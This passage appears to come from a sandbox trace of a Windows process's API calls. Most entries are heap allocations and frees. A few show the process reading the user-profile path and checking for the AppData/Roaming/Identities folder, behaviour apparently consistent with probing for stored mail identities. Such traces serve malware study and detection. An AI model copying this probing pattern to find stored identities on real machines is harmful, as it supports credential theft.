(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0199.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0199.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0199.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Identities", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dentities", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="entities", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntities", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tities", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0199.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.303] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0199.303] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0199.304] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.304] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0199.305] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0199.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0199.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0199.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.308] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0199.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0199.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0199.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0199.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0199.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0199.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.311] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0199.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.311] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0199.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0199.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.312] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.312] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0199.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0199.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0199.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.313] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Identities", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa100039, dwReserved1=0x157ec, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 0xaa58e0 [0199.314] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0199.314] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.314] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, 